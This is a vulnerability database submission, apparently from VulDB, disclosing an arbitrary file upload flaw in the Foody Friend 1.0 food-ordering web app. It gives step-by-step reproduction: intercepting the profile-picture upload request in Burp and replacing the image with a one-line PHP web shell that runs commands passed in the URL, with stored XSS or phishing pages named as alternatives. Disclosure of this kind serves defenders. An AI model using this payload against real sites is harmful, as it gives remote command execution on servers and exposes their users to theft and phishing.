제출 #181276: Foody Friend 1.0 - Arbitrary File Upload정보

제목Foody Friend 1.0 - Arbitrary File Upload
설명# Exploit Title: Foody Friend 1.0 - Arbitrary File Upload # Exploit Author: skalvin aka (CraCkEr) # Date: 12/07/2023 # Vendor: Bug Finder # Vendor Homepage: https://bugfinder.net/ # Software Link: https://bugfinder.net/product/foody-friend-a-saas-based-web-app-food-ordering-bot-for-telegram-and-messenger/25 # Tested on: Windows 10 Pro # Impact: Allows User to upload files to the web server ## Description Allow the Attacker to overwrite critical files by uploading a shell and executing commands on the server, enabling a wide range of attacks, such as server-side and client-side exploits. ## Steps to Reproduce: 1. Login as [Normal User] 2. In [User Dashboard] go to [Edit profile] 3. Choose profile picture & Upload any Image & Click on [Save Changes] 4. Catch the POST Request with [Burp Proxy Intercept] 5. Inject your [Evil-Code] - [phpshell] or [Persistent/Stored XSS] or [Phishing Page] POST /user/profile HTTP/2 ----------------------------------------------------------- Content-Disposition: form-data; name="profile_picture"; filename="shell.png" Content-Type: image/png <?php echo system($_GET['command']); ?> <---- ----------------------------------------------------------- 6. Send the Request 7. Right Click on Your Profile Picture [Copy the Path of the Image] 8. Access your Uploded Evil file on this Path: https://website/assets/upload/userProfile/[SHELL]-[Persistent-XSS] [-] Done
사용자
 skalvin (UID 49463)
제출2023. 07. 12. AM 01:08 (3 연령 ago)
모더레이션2023. 07. 20. AM 09:59 (8 days later)
상태수락
VulDB 항목235064 [Bug Finder Foody Friend 1.0 Profile Picture /user/profile profile_picture 권한 상승]
포인트들17

Do you know our Splunk app?

Download it now for free!